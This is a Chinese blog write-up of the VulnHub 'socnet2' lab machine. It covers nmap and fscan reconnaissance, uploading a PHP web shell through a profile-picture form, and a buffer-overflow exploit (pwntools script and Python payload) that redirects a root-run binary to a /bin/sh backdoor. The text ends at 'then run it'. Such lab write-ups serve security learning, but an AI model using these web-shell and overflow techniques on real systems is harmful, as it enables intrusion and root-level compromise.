<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="vulhub5 难度：middle">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub5">
<meta property="og:url" content="https://qingfeng.tech/2023/10/08/vulnhub5/index.html">
<meta property="og:site_name" content="清风的博客">
<meta property="og:description" content="vulhub5 难度：middle">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193314-369e8m0.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193427-j0jitom.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193512-jkb10rz.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193529-1tqhdoi.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193612-qcubocw.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193747-fpl8dkx.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193934-h1yn5f0.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193958-up1x7ab.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001194609-ptarw8c.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004151147-r09nawk.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004154822-qm78gpy.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004154858-t3r3kw3.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004155054-sqwwo71.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004155315-gunj1d4.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004155501-ipmd04c.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004155554-gca8jgw.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231004155722-nh400tm.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231005100805-de6tdng.png">
<meta property="article:published_time" content="2023-10-08T13:04:19.000Z">
<meta property="article:modified_time" content="2023-10-16T11:04:06.651Z">
<meta property="article:author" content="清风">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qingfeng.tech/Blogimages/vulhub5/image-20231001193314-369e8m0.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>vulnhub5</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><!-- hexo-inject:begin --><!-- hexo-inject:end --><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body class="max-width mx-auto px3 ltr">
    
      <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2023/10/09/vulnhub6/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2023/10/03/QCMS_v6.01/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/10/08/vulnhub5/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/10/08/vulnhub5/&text=vulnhub5"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/10/08/vulnhub5/&is_video=false&description=vulnhub5"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=vulnhub5&body=Check out this article: https://qingfeng.tech/2023/10/08/vulnhub5/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/10/08/vulnhub5/&name=vulnhub5&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/10/08/vulnhub5/&t=vulnhub5"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#vulhub5"><span class="toc-number">1.</span> <span class="toc-text">vulhub5</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getshell"><span class="toc-number">1.2.</span> <span class="toc-text">getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-1"><span class="toc-number">1.3.</span> <span class="toc-text">权限提升 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-2"><span class="toc-number">1.4.</span> <span class="toc-text">权限提升 2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Pwn%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">1.4.1.</span> <span class="toc-text">Pwn参考链接</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        vulnhub5
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">清风</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-10-08T13:04:19.000Z" class="dt-published" itemprop="datePublished">2023-10-08</time>
        
        (Updated: <time datetime="2023-10-16T11:04:06.651Z" class="dt-updated" itemprop="dateModified">2023-10-16</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E9%9D%B6%E6%9C%BA/">靶机</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="vulhub5"><a href="#vulhub5" class="headerlink" title="vulhub5"></a>vulhub5</h1><p>靶机下载地址：</p>
<p><a target="_blank" rel="noopener" href="https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova">https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova</a></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>第一步信息收集，还是老方法我习惯fscan和nmap一起用</p>
<p>Fscan简单探测全局信息</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop/Tools/fscan<span class="token punctuation">]</span>
└─$ ./fscan_amd64 -h 192.168.120.141

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___<span class="token operator">|</span> <span class="token operator">|</span> __ 
 / /_\/____/ __<span class="token operator">|</span>/ __<span class="token operator">|</span> '__/ _` <span class="token operator">|</span>/ __<span class="token operator">|</span> <span class="token operator">|</span>/ /
/ /_\\_____\__ \ <span class="token punctuation">(</span>__<span class="token operator">|</span> <span class="token operator">|</span> <span class="token operator">|</span> <span class="token punctuation">(</span>_<span class="token operator">|</span> <span class="token operator">|</span> <span class="token punctuation">(</span>__<span class="token operator">|</span>   <span class="token operator">&lt;</span>  
\____/     <span class="token operator">|</span>___/\___<span class="token operator">|</span>_<span class="token operator">|</span>  \__,_<span class="token operator">|</span>\___<span class="token operator">|</span>_<span class="token operator">|</span>\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start <span class="token function">ping</span>
<span class="token punctuation">(</span>icmp<span class="token punctuation">)</span> Target 192.168.120.141 is alive
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Icmp alive hosts len is: 1
192.168.120.141:22 <span class="token function">open</span>
192.168.120.141:80 <span class="token function">open</span>
192.168.120.141:8000 <span class="token function">open</span>
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> alive ports len is: 3
start vulscan
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> WebTitle: http://192.168.120.141:8000 code:501 len:216    title:Error response
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> WebTitle: http://192.168.120.141    code:200 len:10609  title:Social Network
</code></pre>
<p>nmap扫描全端口</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop/Tools/fscan<span class="token punctuation">]</span>
└─$ <span class="token function">sudo</span> nmap --min-rate 10000 -p- 192.168.120.141
Starting Nmap 7.94 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2023-10-01 19:15 CST
Nmap scan report <span class="token keyword">for</span> 192.168.120.141
Host is up <span class="token punctuation">(</span>0.000033s latency<span class="token punctuation">)</span>.
Not shown: 65532 closed tcp ports <span class="token punctuation">(</span>reset<span class="token punctuation">)</span>
PORT     STATE SERVICE
22/tcp   <span class="token function">open</span>  <span class="token function">ssh</span>
80/tcp   <span class="token function">open</span>  http
8000/tcp <span class="token function">open</span>  http-alt
MAC Address: 00:0C:29:F4:0E:58 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>

Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 7.00 seconds
</code></pre>
<p>nmap扫描开放端口和操作系统的信息</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop/Tools/fscan<span class="token punctuation">]</span>
└─$ <span class="token function">sudo</span> nmap -sT -sV -O -p 22,80,8000 192.168.120.141
Starting Nmap 7.94 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2023-10-01 19:16 CST
Stats: 0:00:09 elapsed<span class="token punctuation">;</span> 0 hosts completed <span class="token punctuation">(</span>1 up<span class="token punctuation">)</span>, 1 undergoing Service Scan
Service scan Timing: About 33.33% <span class="token keyword">done</span><span class="token punctuation">;</span> ETC: 19:16 <span class="token punctuation">(</span>0:00:12 remaining<span class="token punctuation">)</span>
Nmap scan report <span class="token keyword">for</span> 192.168.120.141
Host is up <span class="token punctuation">(</span>0.00013s latency<span class="token punctuation">)</span>.

PORT     STATE SERVICE VERSION
22/tcp   <span class="token function">open</span>  <span class="token function">ssh</span>     OpenSSH 7.6p1 Ubuntu 4 <span class="token punctuation">(</span>Ubuntu Linux<span class="token punctuation">;</span> protocol 2.0<span class="token punctuation">)</span>
80/tcp   <span class="token function">open</span>  http    Apache httpd 2.4.29 <span class="token variable"><span class="token punctuation">((</span>Ubuntu<span class="token punctuation">))</span></span>
8000/tcp <span class="token function">open</span>  http    BaseHTTPServer 0.3 <span class="token punctuation">(</span>Python 2.7.15rc1<span class="token punctuation">)</span>
MAC Address: 00:0C:29:F4:0E:58 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>
Warning: OSScan results may be unreliable because we could not <span class="token function">find</span> at least 1 <span class="token function">open</span> and 1 closed port
Device type: general purpose
Running: Linux 3.X<span class="token operator">|</span>4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux<span class="token punctuation">;</span> CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="token keyword">.</span>
Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 10.57 seconds
</code></pre>
<h2 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h2><p>开放了两个web服务一个是apache2的，还有一个是python的</p>
<p>这里正常思路就是先访问web服务了，首先是80端口的服务</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193314-369e8m0.png" alt="image">​</p>
<p>是一个用户登录注册的地方，因为这里没有admin的邮箱地址，所以我们只能尝试使用注册来看看登录后的系统是否存在漏洞</p>
<p>首先我们注册账号：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193427-j0jitom.png" alt="image">​</p>
<p>登录后简单测一下漏洞：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193512-jkb10rz.png" alt="image">​</p>
<p>发现有xss（但是没啥用）</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193529-1tqhdoi.png" alt="image">​</p>
<p>测试其他漏洞：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193612-qcubocw.png" alt="image">​</p>
<p>发现了文件上传，这里可以简单测试一下：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193747-fpl8dkx.png" alt="image">​</p>
<p>传个马，似乎成功了，试一下连接：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193934-h1yn5f0.png" alt="image">​</p>
<p>找到地址:<code>http://192.168.120.141/data/images/profiles/3.php</code>​</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001193958-up1x7ab.png" alt="image">​</p>
<p>可以成功连接</p>
<h2 id="权限提升-1"><a href="#权限提升-1" class="headerlink" title="权限提升 1"></a>权限提升 1</h2><p>提权：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231001194609-ptarw8c.png" alt="image">​</p>
<p>发现这个cve依旧可以。。。</p>
<h2 id="权限提升-2"><a href="#权限提升-2" class="headerlink" title="权限提升 2"></a>权限提升 2</h2><p>但是这里的预期解似乎不是这个,预期解需要Pwn</p>
<p>现学Pwn咯</p>
<p>我们getshell之后可以在&#x2F;home&#x2F;user目录看到</p>
<p>​<img src="/Blogimages/vulhub5/image-20231004151147-r09nawk.png" alt="image">​</p>
<p>一个root权限启动的服务</p>
<p>我们下载到<code>Kali</code>​用<code>pwngdb</code>​调试他(未安装可以安装一下：<a target="_blank" rel="noopener" href="https://github.com/pwndbg/pwndbg">pwndbg&#x2F;pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy (github.com)</a>)</p>
<p>先用checksec看一下开启的保护：</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─$ checksec add_record 
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> <span class="token string">'/home/kali/Desktop/add_record'</span>
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE <span class="token punctuation">(</span>0x8048000<span class="token punctuation">)</span>
    Stack:    Executable
    RWX:      Has RWX segments
</code></pre>
<p>除了一个Stack，其他全关</p>
<p>启动一下Pwngdb：</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>/home/kali/Desktop<span class="token punctuation">]</span>
└─<span class="token comment" spellcheck="true"># gdb -q add_record</span>
pwndbg: loaded 147 pwndbg commands and 47 shell commands. Type pwndbg <span class="token punctuation">[</span>--shell <span class="token operator">|</span> --all<span class="token punctuation">]</span> <span class="token punctuation">[</span>filter<span class="token punctuation">]</span> <span class="token keyword">for</span> a list.                                
pwndbg: created <span class="token variable">$rebase</span>, <span class="token variable">$ida</span> GDB functions <span class="token punctuation">(</span>can be used with print/break<span class="token punctuation">)</span>                                                                  
Reading symbols from add_record<span class="token punctuation">..</span>.
<span class="token punctuation">(</span>No debugging symbols found <span class="token keyword">in</span> add_record<span class="token punctuation">)</span>
------- tip of the day <span class="token punctuation">(</span>disable with <span class="token keyword">set</span> show-tips off<span class="token punctuation">)</span> -------
Pwndbg context displays where the program branches to thanks to emulating few instructions into the future. You can disable this with <span class="token keyword">set</span> emulate off <span class="token function">which</span> may also speed up debugging                            
pwndbg<span class="token operator">></span> 
</code></pre>
<p>我们先测试哪里存在栈溢出（因为只会栈溢出）</p>
<p>先准备好多个A用于测试栈溢出：</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─$ python -c <span class="token string">"print('A'*1000)"</span>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</code></pre>
<p>用r执行让程序跑起来：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231004154822-qm78gpy.png" alt="image">​</p>
<p>输入后发现程序异常直接退出，判断这里不存在栈溢出，接着下一个点测试：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231004154858-t3r3kw3.png" alt="image">​</p>
<p>同样正常退出，接着往下测试，直到最后一个explain：</p>
<pre class=" language-bash"><code class="language-bash">pwndbg<span class="token operator">></span> r
Starting program: /home/kali/Desktop/add_record 
<span class="token punctuation">[</span>Thread debugging using libthread_db enabled<span class="token punctuation">]</span>
Using host libthread_db library <span class="token string">"/lib/x86_64-linux-gnu/libthread_db.so.1"</span><span class="token keyword">.</span>                                                                  
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name<span class="token punctuation">(</span>char<span class="token punctuation">)</span>: a
Years worked<span class="token punctuation">(</span>int<span class="token punctuation">)</span>: 1
Salary<span class="token punctuation">(</span>int<span class="token punctuation">)</span>: 1
Ever got <span class="token keyword">in</span> trouble? 1 <span class="token punctuation">(</span>yes<span class="token punctuation">)</span> or 0 <span class="token punctuation">(</span>no<span class="token punctuation">)</span>: 1
Explain: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 <span class="token keyword">in</span> ?? <span class="token punctuation">(</span><span class="token punctuation">)</span>
LEGEND: STACK <span class="token operator">|</span> HEAP <span class="token operator">|</span> CODE <span class="token operator">|</span> DATA <span class="token operator">|</span> RWX <span class="token operator">|</span> RODATA
────────<span class="token punctuation">[</span> REGISTERS / show-flags off / show-compact-regs off <span class="token punctuation">]</span>─────────
*EAX  0xffffd27e ◂— 0x41414141 <span class="token punctuation">(</span><span class="token string">'AAAA'</span><span class="token punctuation">)</span>
*EBX  0x41414141 <span class="token punctuation">(</span><span class="token string">'AAAA'</span><span class="token punctuation">)</span>
*ECX  0xffffd6c0 ◂— <span class="token string">'AAAA'</span>
*EDX  0xffffd662 ◂— <span class="token string">'AAAA'</span>
*EDI  0xffffd340 ◂— 0x41414141 <span class="token punctuation">(</span><span class="token string">'AAAA'</span><span class="token punctuation">)</span>
*ESI  0x80488d0 <span class="token punctuation">(</span>__libc_csu_init<span class="token punctuation">)</span> ◂— push ebp
*EBP  0x41414141 <span class="token punctuation">(</span><span class="token string">'AAAA'</span><span class="token punctuation">)</span>
*ESP  0xffffd2c0 ◂— 0x41414141 <span class="token punctuation">(</span><span class="token string">'AAAA'</span><span class="token punctuation">)</span>
*EIP  0x41414141 <span class="token punctuation">(</span><span class="token string">'AAAA'</span><span class="token punctuation">)</span>
──────────────────<span class="token punctuation">[</span> DISASM / i386 / <span class="token keyword">set</span> emulate on <span class="token punctuation">]</span>───────────────────
Invalid address 0x41414141










───────────────────────────────<span class="token punctuation">[</span> STACK <span class="token punctuation">]</span>───────────────────────────────
00:0000│ esp 0xffffd2c0 ◂— 0x41414141 <span class="token punctuation">(</span><span class="token string">'AAAA'</span><span class="token punctuation">)</span>
<span class="token punctuation">..</span>. ↓        7 skipped
─────────────────────────────<span class="token punctuation">[</span> BACKTRACE <span class="token punctuation">]</span>─────────────────────────────
 ► 0 0x41414141
   1 0x41414141
   2 0x41414141
   3 0x41414141
   4 0x41414141
   5 0x41414141
   6 0x41414141
   7 0x41414141
───────────────────────────────────────────────────────────────────────
</code></pre>
<p>这里发现可以覆盖掉栈的地址，说明我们这里是可能存在漏洞的</p>
<p>如何利用呢？</p>
<p>利用IDA打开这个程序可以发现</p>
<p>​<img src="/Blogimages/vulhub5/image-20231004155054-sqwwo71.png" alt="image">​</p>
<p>这个程序是存在<code>backdoor</code>​的，直接返回一个<code>system(&#39;/bin/sh&#39;)</code>​</p>
<p>所以只要覆盖掉<code>EIP</code>​的地址为<code>backdoor</code>​函数的地址即可执行backdoor返回一个<code>/bin/sh</code>​</p>
<p>下一步工作就是测试哪个位置可以覆盖EIP，因为我们输入的1000个A中不知道具体是哪几个站住了EIP的地址</p>
<p>只知道确实是可以覆盖的：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231004155315-gunj1d4.png" alt="image">​</p>
<p>所以我们利用MSF生成的随机字符串来定位：</p>
<pre class=" language-bash"><code class="language-bash">msf-pattern_create -l 1000
</code></pre>
<p>​<img src="/Blogimages/vulhub5/image-20231004155501-ipmd04c.png" alt="image">​</p>
<p>如图我们可以知道是0Ac1覆盖了EIP，所以我们查找0Ac1前面有几个字符：</p>
<pre class=" language-BASH"><code class="language-BASH">msf-pattern_offset -q 0Ab1
</code></pre>
<p>​<img src="/Blogimages/vulhub5/image-20231004155554-gca8jgw.png" alt="image">​</p>
<p>发现是62个，所以我们前面填充62位</p>
<p>开始编写EXP：</p>
<p>​<img src="/Blogimages/vulhub5/image-20231004155722-nh400tm.png" alt="image">​</p>
<p>这里看到<code>backdoor</code>​的地址是<code>0x08048676</code>​</p>
<p>垃圾字符是62个</p>
<p>写EXP：</p>
<pre class=" language-pyrhon"><code class="language-pyrhon">from pwn import * 

p = process("./add_record")
backdoor = 0x8048676
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')

payload = b'a'*62 + p32(backdoor)
p.sendline(payload)
p.interactive()
</code></pre>
<p>但是只能在目标系统上执行不能打远程环境，用这个</p>
<pre class=" language-bash"><code class="language-bash">python -c <span class="token string">"import struct;print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))"</span> <span class="token operator">></span> payload
</code></pre>
<p>然后运行</p>
